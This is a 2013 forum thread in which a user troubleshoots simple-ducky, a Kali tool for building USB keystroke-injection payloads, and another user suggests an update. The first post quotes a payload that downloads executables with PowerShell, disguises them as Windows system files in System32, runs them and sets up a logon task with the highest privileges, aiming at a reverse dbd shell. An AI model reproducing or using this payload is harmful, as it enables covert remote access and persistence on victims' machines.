jjd Posted September 24, 2013 Share Posted September 24, 2013 I'm using Kali to create my payload and having a few issued. I'm trying a rev dbd and simple-ducky does not seem to be doing anything with my input. when it asks for my rev address and port i enter them then when it asks for my website i enter that and when it asks if i want to start listening I say yes and get two errors. chmod: cannot access `/usr/share/simple-ducky/misc/dbd/binaries/dbd': No such file or directory cp: cannot stat `/usr/share/simple-ducky/misc/dbd/binaries/dbd': No such file or directory listening on port 1331 and it does not enter my input into the payload. relevant part of payload: STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///winmgnt.txt','%WINDIR%\System32\winmgnt.exe') ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///taskmgnt.txt','%WINDIR%\System32\taskmgnt.exe') ENTER STRING %WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\winmgnt.exe ENTER STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" anyone got any ideas? is it something with my install? thanks! Quote Link to comment Share on other sites More sharing options...
skysploit Posted October 3, 2013 Share Posted October 3, 2013 jjd, What version of the simple-ducky are you running? In your terminal run: simple-ducky-update and see if that fixes the problem. It appears that dbd is not getting forked over properly. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.